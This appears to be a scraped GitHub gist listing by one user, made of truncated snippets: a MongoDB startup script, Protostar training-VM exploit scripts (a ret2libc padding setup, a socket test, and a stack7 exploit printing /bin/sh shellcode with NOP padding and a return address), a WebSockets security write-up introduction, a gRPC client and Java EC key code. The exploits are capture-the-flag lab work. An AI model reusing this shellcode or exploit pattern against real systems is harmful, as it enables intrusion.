#!/bin/bash
echo 0 > /proc/sys/vm/zone_reclaim_mode
ulimit -n 64000
numactl --interleave=all /usr/bin/mongod --config /etc/mongod.conf
@luc-lynx
luc-lynx / final0.py
Created December 18, 2017 07:29
Protostar final0 exploit
# ret2libc technique
import struct
import socket
import telnetlib
HOST = '127.0.0.1'
PORT = 2995
padding = 'a' * 510 + '\x00' + 'aaaabbbbccccddddeeeef'
@luc-lynx
luc-lynx / socktest.py
Created December 17, 2017 15:00
Protostar net1
import socket
import struct
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
HOST = "127.0.0.1"
PORT = 2998
s.connect((HOST, PORT))
@luc-lynx
luc-lynx / exploit.py
Created November 1, 2017 08:21
protostar_stack7_exploit
import struct
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
jmp_addr = struct.pack("I", 0x080484bf)
print shellcode + "\x90" * 52 + jmp_addr
@luc-lynx
luc-lynx / WebSockets.md
Created September 2, 2017 20:55 — forked from subudeepak/WebSockets.md
The problems and some security implications of websockets - Cross-site WebSockets Scripting (XSWS)

WebSockets - An Introduction

WebSockets is a modern HTML5 standard which makes communication between client and server a lot simpler than ever. We are all familiar with the technology of sockets. Sockets have been fundamental to network communication for a long time, but communication from within the browser has usually been restricted. The general restrictions were:

  • The server had a permanent listener, while the client (aka browser) had no fixed listener for a longer-term connection. Hence, every communication was restricted to the client requesting and the server responding.
  • This meant that unless the client requested a particular resource, the server was unable to push that resource to the client.
  • This was detrimental, since the client was then forced to check with the server at regular intervals. As a result, a lot of libraries focused on optimizing asynchronous calls and identifying the responses to asynchronous calls. Notably t
@luc-lynx
luc-lynx / grpc_client.py
Created May 29, 2017 07:15
grpc custom authentication scheme example (python)
import grpc
import helloworld_pb2
import helloworld_pb2_grpc
# you need to use secure port,
# otherwise call credentials won't be transmitted
def run():
    with open('server.crt', 'rb') as f:
        trusted_certs = f.read()
private static ECKey generateECJWK(final ECKey.Curve curve)
        throws Exception {
    final ECParameterSpec ecParameterSpec = curve.toECParameterSpec();
    KeyPairGenerator generator = KeyPairGenerator.getInstance("EC");
    generator.initialize(ecParameterSpec);
    KeyPair keyPair = generator.generateKeyPair();
    final ECPrivateKey privateKey = (ECPrivateKey) keyPair.getPrivate();